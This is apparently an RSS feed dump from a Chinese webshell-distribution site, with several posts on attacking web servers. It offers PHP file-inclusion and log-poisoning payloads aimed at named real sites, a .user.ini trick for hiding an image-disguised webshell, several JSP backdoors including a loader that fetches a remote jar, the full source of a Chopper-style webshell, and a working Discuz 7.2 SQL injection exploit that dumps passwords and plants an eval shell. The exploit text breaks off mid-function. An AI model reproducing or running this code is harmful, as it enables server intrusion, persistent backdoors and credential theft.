最新免杀asp木马|asp大马 http://www.mumaasp.com asp提权大马,asp防删隐藏木马,asp木马加密,asp木马解密,asp不死复活木马 Thu, 09 Apr 2015 09:19:16 +0000 zh-CN hourly 1 http://wordpress.org/?v=3.4.1 php大马 小马巧用包含妙招 http://www.mumaasp.com/243.html http://www.mumaasp.com/243.html#comments Thu, 09 Apr 2015 09:19:15 +0000 admin http://www.mumaasp.com/?p=243 Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 大家都懒得测试,我就来整理下. 1.普通本地包含; <?php $query=$_GET['p']; include($query); ?> poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php ../hanguo/test.php为包含的路径. baohan1.jpg 只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。 2.截断本地包含 require_once($a.'.php'); include($a.".php"); 等等类似此包含的函数..WINDOWS下还有特别用处: \.或者./或者\或者/截断 (WINDOWS都可以使用.) [link href="WooYun: 快乐购某分站文件包含漏洞"]波波虎[/link] 截断的原理 [link href="/_a href=/"http://www.wooyun.org/bugs/wooyun-2011-02236" target="_blank">WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link] (Linux .//可以.) %00截断包含,有gpc=off和php版本限制 poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00 3.远程包含allow_url_include=On就是远程文件包含了,为off那就只能本地包含了. 测试case: <?php $query=$_GET['p']; include($query.".php"); ?> 连接:http://www.baidu.com/explame.php?p=http://www.mumaasp.com/yeah.txt 爆错了: Warning: main(http://www.mumaasp.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3 include($query.".php");代码的缘故,在后面加上了".php",导致yeah.txt变成了yeah.txt.php. 这里我们不需要截断啦,来个360计之----将计就计. 在www.axxer.com创建个yeah.php文件; 然后http://www.baidu.com/explame.php?p=http://www.mumaasp.com/yeah,自动在后面加 上.php;多么爱。。。。 远程包含小连接 我们还可以用php自带协议来利用: 包含data:// 或者php://input 伪协议 这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。 http://www.schnelltest24.de/index.php?page=/etc/passwd//这个没有截断,我们尝试下用协议看看. baohan2.jpg 利用协议然后POST发送利用代码,哈哈;多么有爱~~~~. 4.日记包含高级利用 [link href="/_a href=/"http://www.wooyun.org/bugs/wooyun-2011-02236" target="_blank">WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link] 此连接已经透露出技巧了呢,连接思路简单说下: (1)访问带有一句话的错误连接(http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx...),此连接将记录到error.log错误记录文件中. (2)找到包含漏洞的地方,包含到error.log文件的路径.然后在自定义s参数中输入我们恶意代码. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././..........) 一先限制以及突破: 类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php 这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志. 可以使用:伪造没有Connection HTTP标头的请求包 一点连接:内容1 内容2 5.其他高级利用 (1)包含/proc/self/environ环境变量: 这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样 利用(文章中第四点有详细介绍了.) (2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符截断.上面介绍过了. (3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符截断.上面介绍过了. (2) (3)点介绍 phpinfo爆破包含pdf  ]]> http://www.mumaasp.com/243.html/feed 0 .user.ini文件构成的超强PHP后门 http://www.mumaasp.com/222.html http://www.mumaasp.com/222.html#comments Tue, 30 Dec 2014 10:09:00 +0000 admin http://www.mumaasp.com/?p=222 .user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。

.user.ini


那么什么是.user.ini? 这得从php.ini说起了。php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分为几种:PHP_INI_SYSTEMPHP_INI_PERDIRPHP_INI_ALLPHP_INI_USER。 在此可以查看:http://php.net/manual/zh/ini.list.php 这几种模式有什么区别?看看官方的解释:   enter image description here 其中就提到了,模式为PHP_INI_USER的配置项,可以在ini_set()函数中设置、注册表中设置,再就是.user.ini中设置。 这里就提到了.user.ini,那么这是个什么配置文件?那么官方文档在这里又解释了: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 在 .user.ini 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。 这里就很清楚了,.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置) 实际上,除了PHP_INI_SYSTEM以外的模式(包括PHP_INI_ALL)都是可以通过.user.ini来设置的。 而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载。 然后我们看到php.ini中的配置项,可惜我沮丧地发现,只要稍微敏感的配置项,都是PHP_INI_SYSTEM模式的(甚至是php.ini only的),包括disable_functionsextension_direnable_dl等。 不过,我们可以很容易地借助.user.ini文件来构造一个“后门”。 Php配置项中有两个比较有意思的项(下图第一、四个): enter image description here auto_append_fileauto_prepend_file,点开看看什么意思: enter image description here 指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:
auto_prepend_file=01.gif 
01.gif是要包含的文件。 所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。 测试一下,我分别在IIS6.0+Fastcgi+PHP5.3和nginx+fpm+php5.3上测试。 目录下有.user.ini,和包含webshell的01.gif,和正常php文件echo.php: enter image description here enter image description here 访问echo.php即可看到后门: enter image description here Nginx下同样: enter image description here enter image description here 那么,我们可以猥琐地想一下,在哪些情况下可以用到这个姿势? 比如,某网站限制不允许上传.php文件,你便可以上传一个.user.ini,再上传一个图片马,包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件,否则也不能包含了。 再比如,你只是想隐藏个后门,这个方式是最方便的。]]>
http://www.mumaasp.com/222.html/feed 0
Jsp小后门,Jsp一句话木马后门解密 http://www.mumaasp.com/203.html http://www.mumaasp.com/203.html#comments Mon, 22 Dec 2014 06:25:48 +0000 admin http://www.mumaasp.com/?p=203 一:执行系统命令: 无回显执行系统命令:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的:
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
请求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls Jsp 小后门,Jsp 一句话木马后门详解 二、把字符串编码后写入指定文件的: 1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234 写入web目录:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
请求:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234 2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求:http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234 写入web目录:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
请求:http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234 三:下载远程文件(不用apache io utils的话没办法把inputstream转byte,所以很长…)
<%
    java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
    byte[] b = new byte[1024];
    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
    int a = -1;
    while ((a = in.read(b)) != -1) {
        baos.write(b, 0, a);
    }
    new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray());
%>
请求:http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png 下载到web路径:
<%
    java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();
    byte[] b = new byte[1024];
    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();
    int a = -1;
    while ((a = in.read(b)) != -1) {
        baos.write(b, 0, a);
    }
    new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray());
%>
请求:http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png 四:反射调用外部jar,完美后门 如果嫌弃上面的后门功能太弱太陈旧可以试试这个:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
请求:http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A Jsp 小后门,Jsp 一句话木马后门详解 菜刀连接:http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar,密码023. Jsp 小后门,Jsp 一句话木马后门详解 解: 利用反射加载一个外部的jar到当前应用,反射执行输出处理结果。request.getParameterMap()包含了请求的所有参数。由于加载的是外部的jar包,所以要求服务器必须能访问到这个jar地址。 下载:
Cat.jar (rar) Load代码:
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.Map.Entry;

/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
/**
 *
 * @author yz
 */
public class Load {

    public static String load(Map<String,String[]> map){
        try {
            Map<String,String> request = new HashMap<String,String>();
            for (Entry<String, String[]> entrySet : map.entrySet()) {
                String key = entrySet.getKey();
                String value = entrySet.getValue()[0];
                request.put(key, value);
            }
            return new Chopper().doPost(request);
        } catch (IOException ex) {
            return ex.toString();
        }
    }

}
Chopper代码:
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLClassLoader;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.ResultSetMetaData;
import java.sql.Statement;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.Map;

public class Chopper{

    public static String getPassword() throws IOException {
        return "023";
    }

    String cs = "UTF-8";

    String encoding(String s) throws Exception {
        return new String(s.getBytes("ISO-8859-1"), cs);
    }

    Connection getConnection(String s) throws Exception {
        String[] x = s.trim().split("\r\n");
        try {
            Class.forName(x[0].trim());
        } catch (ClassNotFoundException e) {
            boolean classNotFound = true;
            BufferedReader br = new BufferedReader(new InputStreamReader(this.getClass().getResourceAsStream("/map.txt")));
            String str = "";
            while ((str = br.readLine()) != null) {
                String[] arr = str.split("=");
                if (arr.length == 2 && arr[0].trim().equals(x[0].trim())) {
                    try {
                        URLClassLoader ucl = (URLClassLoader) ClassLoader.getSystemClassLoader();
                        Method m = URLClassLoader.class.getDeclaredMethod("addURL", URL.class);
                        m.setAccessible(true);
                        m.invoke(ucl, new Object[]{new URL(/arr[1]/)});
                        Class.forName(arr[0].trim());
                        classNotFound = false;
                        break;
                    } catch (ClassNotFoundException ex) {
                        throw ex;
                    }
                }
            }
            if (classNotFound) {
                throw e;
            }
        }
        if (x[1].contains("jdbc:oracle")) {
            return DriverManager.getConnection(x[1].trim() + ":" + x[4],
                    x[2].equalsIgnoreCase("[/null]") ? "" : x[2],
                    x[3].equalsIgnoreCase("[/null]") ? "" : x[3]);
        } else {
            Connection c = DriverManager.getConnection(x[1].trim(),
                    x[2].equalsIgnoreCase("[/null]") ? "" : x[2],
                    x[3].equalsIgnoreCase("[/null]") ? "" : x[3]);
            if (x.length > 4) {
                c.setCatalog(x[4]);
            }
            return c;
        }
    }

    void listRoots(ByteArrayOutputStream out) throws Exception {
        File r[] = File.listRoots();
        for (File f : r) {
            out.write((f.getName()).getBytes(cs));
        }
    }

    void dir(String s, ByteArrayOutputStream out) throws Exception {
        File l[] = new File(s).listFiles();
        for (File f : l) {
            String mt = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date(f.lastModified()));
            String rw = f.canRead() ? "R" : "" + (f.canWrite() ? " W" : "");
            out.write((f.getName() + (f.isDirectory() ? "/" : "") + "\t" + mt + "\t" + f.length() + "\t" + rw + "\n").getBytes(cs));
        }
    }

    void deleteFiles(File f) throws Exception {
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (File fs : x) {
                deleteFiles(fs);
            }
        }
        f.delete();
    }

    byte[] readFile(String s) throws Exception {
        int n;
        byte[] b = new byte[1024];
        BufferedInputStream bis = new BufferedInputStream(new FileInputStream(s));
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        while ((n = bis.read(b)) != -1) {
            bos.write(b, 0, n);
        }
        bis.close();
        return bos.toByteArray();
    }

    void upload(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));
        }
        os.close();
    }

    void filesMove(File sf, File df) throws Exception {
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (File z1 : z) {
                filesMove(new File(sf, z1.getName()), new File(df, z1.getName()));
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[1024];
            while ((n = is.read(b)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }

    void fileMove(File s, File d) throws Exception {
        s.renameTo(d);
    }

    void mkdir(File s) throws Exception {
        s.mkdir();
    }

    void setLastModified(File s, String t) throws Exception {
        s.setLastModified(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").parse(t).getTime());
    }

    void downloadRemoteFile(String s, String d) throws Exception {
        int n = 0;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) new URL(/s/).openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[1024];
        while ((n = is.read(b)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }

    void inputStreamToOutPutStream(InputStream is, ByteArrayOutputStream out) throws Exception {
        int i = -1;
        byte[] b = new byte[1024];
        while ((i = is.read(b)) != -1) {
            out.write(b, 0, i);
        }
    }

    void getCurrentDB(String s, ByteArrayOutputStream out) throws Exception {
        Connection c = getConnection(s);
        ResultSet r = s.contains("jdbc:oracle") ? c.getMetaData().getSchemas() : c.getMetaData().getCatalogs();
        while (r.next()) {
            out.write((r.getObject(1) + "\t").getBytes(cs));
        }
        r.close();
        c.close();
    }

    void getTableName(String s, ByteArrayOutputStream out) throws Exception {
        Connection c = getConnection(s);
        String[] x = s.trim().split("\r\n");
        ResultSet r = c.getMetaData().getTables(null, s.contains("jdbc:oracle") ? x.length > 5 ? x[5] : x[4] : null, "%", new String[]{"TABLE"});
        while (r.next()) {
            out.write((r.getObject("TABLE_NAME") + "\t").getBytes(cs));
        }
        r.close();
        c.close();
    }

    void getTableColumn(String s, ByteArrayOutputStream out) throws Exception {
        String[] x = s.trim().split("\r\n");
        Connection c = getConnection(s);
        ResultSet r = c.prepareStatement("select * from " + x[x.length - 1]).executeQuery();
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
            out.write((d.getColumnName(i) + " (" + d.getColumnTypeName(i) + ")\t").getBytes(cs));
        }
        r.close();
        c.close();
    }

    void executeQuery(String cs, String s, String q, ByteArrayOutputStream out, String p) throws Exception {
        Connection c = getConnection(s);
        Statement m = c.createStatement(1005, 1008);
        BufferedWriter bw = null;
        try {
            boolean f = q.contains("--f:");
            ResultSet r = m.executeQuery(f ? q.substring(0, q.indexOf("--f:")) : q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (int i = 1; i <= n; i++) {
                out.write((d.getColumnName(i) + "\t|\t").getBytes(cs));
            }
            out.write(("\r\n").getBytes(cs));
            if (f) {
                File file = new File(p);
                if (!q.contains("-to:")) {
                    file.mkdir();
                }
                bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.contains("-to:") ? p.trim() : p + q.substring(q.indexOf("--f:") + 4, q.length()).trim()), true), cs));
            }
            while (r.next()) {
                for (int i = 1; i <= n; i++) {
                    if (f) {
                        bw.write(r.getObject(i) + "" + "\t");
                        bw.flush();
                    } else {
                        out.write((r.getObject(i) + "" + "\t|\t").getBytes(cs));
                    }
                }
                if (bw != null) {
                    bw.newLine();
                }
                out.write(("\r\n").getBytes(cs));
            }
            r.close();
            if (bw != null) {
                bw.close();
            }
        } catch (Exception e) {
            out.write(("Result\t|\t\r\n").getBytes(cs));
            try {
                m.executeUpdate(q);
                out.write(("Execute Successfully!\t|\t\r\n").getBytes(cs));
            } catch (Exception ee) {
                out.write((ee.toString() + "\t|\t\r\n").getBytes(cs));
            }
        }
        m.close();
        c.close();
    }

    public String doPost(Map<String,String>request) throws IOException {
        cs = request.get("z0") != null ? request.get("z0") + "" : cs;
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try {
            char z = (char) request.get(getPassword()).getBytes()[0];
            String z1 = encoding(request.get("z1") + "");
            String z2 = encoding(request.get("z2") + "");
            out.write("->|".getBytes(cs));
            String s = new File("").getCanonicalPath();
            byte[] returnTrue = "1".getBytes(cs);
            switch (z) {
                case 'A':
                    out.write((s + "\t").getBytes(cs));
                    if (!s.substring(0, 1).equals("/")) {
                        listRoots(out);
                    }
                    break;
                case 'B':
                    dir(z1, out);
                    break;
                case 'C':
                    String l = "";
                    BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
                    while ((l = br.readLine()) != null) {
                        out.write((l + "\r\n").getBytes(cs));
                    }
                    br.close();
                    break;
                case 'D':
                    BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
                    bw.write(z2);
                    bw.flush();
                    bw.close();
                    out.write(returnTrue);
                    break;
                case 'E':
                    deleteFiles(new File(z1));
                    out.write("1".getBytes(cs));
                    break;
                case 'F':
                    out.write(readFile(z1));
                case 'G':
                    upload(z1, z2);
                    out.write(returnTrue);
                    break;
                case 'H':
                    filesMove(new File(z1), new File(z2));
                    out.write(returnTrue);
                    break;
                case 'I':
                    fileMove(new File(z1), new File(z2));
                    out.write(returnTrue);
                    break;
                case 'J':
                    mkdir(new File(z1));
                    out.write(returnTrue);
                    break;
                case 'K':
                    setLastModified(new File(z1), z2);
                    out.write(returnTrue);
                    break;
                case 'L':
                    downloadRemoteFile(z1, z2);
                    out.write(returnTrue);
                    break;
                case 'M':
                    String[] c = {z1.substring(2), z1.substring(0, 2), z2};
                    Process p = Runtime.getRuntime().exec(c);
                    inputStreamToOutPutStream(p.getInputStream(), out);
                    inputStreamToOutPutStream(p.getErrorStream(), out);
                    break;
                case 'N':
                    getCurrentDB(z1, out);
                    break;
                case 'O':
                    getTableName(z1, out);
                    break;
                case 'P':
                    getTableColumn(z1, out);
                    break;
                case 'Q':
                    executeQuery(cs, z1, z2, out, z2.contains("-to:") ? z2.substring(z2.indexOf("-to:") + 4, z2.length()) : s.replaceAll("\\\\", "/") + "images/");
                    break;
            }
        } catch (Exception e) {
            out.write(("ERROR" + ":// " + e.toString()).getBytes(cs));
        }
        out.write(("|<-").getBytes(cs));
        return new String(out.toByteArray());
    }

}
map.txt:
oracle.jdbc.driver.OracleDriver=http://p2j.cn/jdbc/classes12.jar
com.mysql.jdbc.Driver=http://p2j.cn/jdbc/mysql-connector-java-5.1.14-bin.jar
com.microsoft.jdbc.sqlserver.SQLServerDriver=http://p2j.cn/jdbc/sqlserver2000/msbase.jar,http://p2j.cn/jdbc/sqlserver2000/mssqlserver.jar,http://p2j.cn/jdbc/sqlserver2000/msutil.jar
com.microsoft.sqlserver.jdbc.SQLServerDriver=http://p2j.cn/jdbc/sqljdbc4.jar
com.ibm.db2.jcc.DB2Driver=http://p2j.cn/jdbc/db2java.jar
com.informix.jdbc.IfxDriver=http://p2j.cn/jdbc/ifxjdbc.jar
com.sybase.jdbc3.jdbc.SybDriver=http://p2j.cn/jdbc/jconn3d.jar
org.postgresql.Driver=http://p2j.cn/jdbc/postgresql-9.2-1003.jdbc4.jar
com.ncr.teradata.TeraDriver=http://p2j.cn/jdbc/teradata-jdbc4-14.00.00.04.jar
com.hxtt.sql.access.AccessDriver=http://p2j.cn/jdbc/Access_JDBC30.jar
org.apache.derby.jdbc.ClientDriver=http://p2j.cn/jdbc/derby.jar
org.hsqldb.jdbcDriver=http://p2j.cn/jdbc/hsqldb.jar
net.sourceforge.jtds.jdbc.Driver=http://p2j.cn/jdbc/jtds-1.2.5.jar
mongodb=http://p2j.cn/jdbc/mongo-java-driver-2.9.3.jar
]]> http://www.mumaasp.com/203.html/feed 0 Discuz! 7.2 SQL注入exp(getshell版)木马asp转载 http://www.mumaasp.com/195.html http://www.mumaasp.com/195.html#comments Fri, 11 Jul 2014 10:09:18 +0000 admin http://www.mumaasp.com/?p=195 参数: 1.可直接getshell 2.爆管理账号密码 3.爆表前缀 如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。  
<?php

/**
* @author: xiaoma
* @blog  : www.i0day.com
* @date  : 2014.7.2 23:1
*/

error_reporting(0);
set_time_limit(3000);
$host=$argv[1];
$path=$argv[2];
$js=$argv[3];
$timestamp = time()+10*3600;
$table="cdb_";//表名

if ($argc < 2) {
    print_r('
  ********************************************************
  *  Discuz faq.php SQL Injection Exp                    *
  *  ---------By:Www.i0day.com-----------               *
  *     Usage: php '.$argv[0].' url [js]                    *
  *  -------------------------------------               *
  *  js选项: 1.GetShell 2.取密码 3.查表前缀              *
  *                                                      *
  *   php '.$argv[0].' Www.i0day.com / 1                    *
  *   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
  *                                                      *
  *                                                      *
  ********************************************************
     ');
     exit;
}
if($js==1){
    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";
     $resp = sendpack($host,$path,$sql);

    if(strpos($resp,"::")==-1){
        echo '表前缀可能不是默认cdb_ 请先查看表前缀!';
    }else{
    preg_match("/::(.*)::/",$resp,$matches);
    $lenght=intval($matches[1]);
    if($lenght){
        if($lenght<=124){
            $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
             $resp = sendpack($host,$path,$sql);
            if(strpos($resp,"1\^")!=-1){
                preg_match("/1\^(.*)\'/U",$resp,$key1);
            $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
             $resp = sendpack($host,$path,$sql);
            preg_match("/1\^(.*)\'/U",$resp,$key2);
            $key=$key1[1].$key2[1];
            $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key));
             $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item>
</root>';
            $cmd2='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">bbs.49you.com</item>
</root>';
            $html1 = send($cmd1);
            $res1=substr($html1,-1);
            $html2 = send($cmd2);
            $res2=substr($html1,-1);
            if($res1=='1'&&$res2=='1'){
            echo "shell地址:http://".$host.$path.'config.inc.php   pass:i0day';
            }
            }else{
                echo '获取失败';
            }
        }
    }
   }

}elseif($js==2){
    $sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";
     $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"\^\^\^")!=-1){
        preg_match("/\^\^\^(.*)\^/U",$resp,$password);
        echo '密码:'.$password[1];
        }else{
            echo '表前缀可能不是默认cdb_ 请先查看表前缀!';
        }
}elseif($js==3){
    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23";
     $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"1\^")!=-1){
        preg_match("/1\^(.*)\^/U",$resp,$t);

        if(strpos($t[1],"cdb_")!=-1){
            echo "表名为:".hex2str($t[1])." 表前缀为默认cdb_ 无需修改";
        }else{
            echo "表名:".hex2str($t[1]).' 不是默认表名cdb_请自行修改代码中的$table';
        }
    }else{
        echo "查看表前缀失败,Sorry";
    }
}else{
    echo "未选择脚本功能";
}

function sendpack($host,$path,$sql,$js){
       $data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n";
        $data.="Host:".$host."\r\n";
        $data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";
         $data.="Connection: close\r\n\r\n";
        //$data.=$html."\r\n";
        $ock=fsockopen($host,80);

        if(!$ock){
        echo "No response from ".$host;
        die();

        }
        fwrite($ock,$data);

        $resp = '';

        while (!feof($ock)) {

                $resp.=fread($ock, 1024);
                }

        return $resp;

}
function send($cmd){
    global $host,$code,$path;
    $message = "POST ".$path."/api/uc.php?code=".$code."  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: ".$host."\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
     $message .= "Host: ".$host."\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;

  //var_dump($message);
    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;

    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
     $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
             return substr($result, 26);
        } else {
                return '';
            }
